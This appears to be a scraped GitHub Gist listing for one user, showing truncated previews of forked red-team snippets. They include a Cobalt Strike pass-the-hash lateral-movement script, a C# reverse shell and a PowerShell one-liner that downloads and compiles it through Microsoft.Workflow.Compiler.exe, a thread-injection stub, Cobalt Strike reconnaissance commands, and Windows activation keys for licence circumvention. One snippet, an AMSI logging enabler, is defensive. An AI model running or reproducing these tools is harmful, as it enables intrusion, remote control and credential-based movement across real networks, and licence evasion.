Skip to content

Instantly share code, notes, and snippets.

Dave Hardy davehardy20

  • UK
Block or report user

Report or block davehardy20

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
davehardy20 / EnableAMSILogging.ps1
Created Nov 15, 2018 — forked from mattifestation/EnableAMSILogging.ps1
Enables AMSI logging to the AMSI/Operational event log
View EnableAMSILogging.ps1
# Run this elevated, reboot, boom.
# Feel free to name this whatever you want
$AutoLoggerName = 'MyAMSILogger'
$AutoLoggerGuid = "{$((New-Guid).Guid)}"
New-AutologgerConfig -Name $AutoLoggerName -Guid $AutoLoggerGuid -Start Enabled
Add-EtwTraceProvider -AutologgerName $AutoLoggerName -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}' -Level 0xff -MatchAnyKeyword 0x80000000000001 -Property 0x41
davehardy20 / smbexec_psh.cna
Created Oct 24, 2018 — forked from realoriginal/smbexec_psh.cna
Cheap solution to problems with make_token, psexec/lateral movement/sekurlsa::pth for cross-domain PTH in the same forest.
View smbexec_psh.cna
# Lateral Movement using Invoke-TheHash toolkit
# Written by Mumbai
# git clone
# mv Invoke-TheHash/Invoke-TheHash.ps1 Invoke-TheHash.ps1
# cat Invoke-TheHash/Invoke-*.ps1 >> Invoke-TheHash.ps1
beacon_command_register("smbexec_psh", "Lateral movement using Invoke-TheHash toolkit",
"Synopsis: smbexec_psh [x86/x64] [target] [listener] [username] [domain] [ntlm]\n\n",
"Run a payload on a target via Invoke-TheHash SMBExec");
davehardy20 / windows10activation
Created Oct 24, 2018 — forked from realoriginal/windows10activation
Activate Windows 10 without Any Activator
View windows10activation
1. Open CMD as Administrator
2. Paste the following commands into the Cmd: One by one, follow the order.
cscript slmgr.vbs /ipk "SERIAL NUMBER HERE"
Replace SERIAL NUMBER HER with any of these, according your Windows 10 installation type.
Home/Core TX9XD-98N7V-6WMQ6-BX7FG-H8Q99
Home/Core (Country Specific) PVMJN-6DFY6-9CCP6-7BKTT-D3WVR
Home/Core (Single Language) 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH
View sedebug_rtlcreatethread.c
/*! @brief */
#include <windows.h>
#include <stdio.h>
typedef DWORD(WINAPI *prototype_RtlCreateUserThread)(
HANDLE ProcessHandle,
BOOL CreateSuspended,
ULONG StackZeroBits,
PULONG StackReserved,
davehardy20 / REV.txt
Created Oct 22, 2018 — forked from BankSecurity/REV.txt
Microsoft.Workflow.Compiler.exe Abuse for open a live C# Reverse Shell
View REV.txt
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="" xmlns="">
<files xmlns:d2p1="">
<parameters xmlns:d2p1="">
<assemblyNames xmlns:d3p1="" xmlns="" />
<compilerOptions i:nil="true" xmlns="" />
<coreAssemblyFileName xmlns=""></coreAssemblyFileName>
<embeddedResources xmlns:d3p1="" xmlns="" />
davehardy20 / Rev.Shell
Created Oct 22, 2018 — forked from BankSecurity/Rev.Shell
Abuse Microsoft.Workflow.Compiler.exe for compile C# Reverse Shell
View Rev.Shell
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Workflow.Activities;
public class Program : SequentialWorkflowActivity
davehardy20 / PowerShell_Command.txt
Created Oct 22, 2018 — forked from BankSecurity/PowerShell_Command.txt
Reverse Shell Powershell command Abusing Microsoft.Workflow.Compiler.exe
View PowerShell_Command.txt
powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\Rev.Shell') }" && C:\Windows\Microsof
davehardy20 / Simple_Rev_Shell.cs
Created Oct 22, 2018 — forked from BankSecurity/Simple_Rev_Shell.cs
C# Simple Reverse Shell Code
View Simple_Rev_Shell.cs
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
View Build_In_Memory_CSharp_Project.txt
After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.
Basic gist after running PS script statements:
- Loads C# project from file or web URL
- Create various tmp files
- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
davehardy20 / cobaltstrike_sa.txt
Created Sep 29, 2018 — forked from HarmJ0y/cobaltstrike_sa.txt
Cobalt Strike Situational Awareness Commands
View cobaltstrike_sa.txt
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
You can’t perform that action at this time.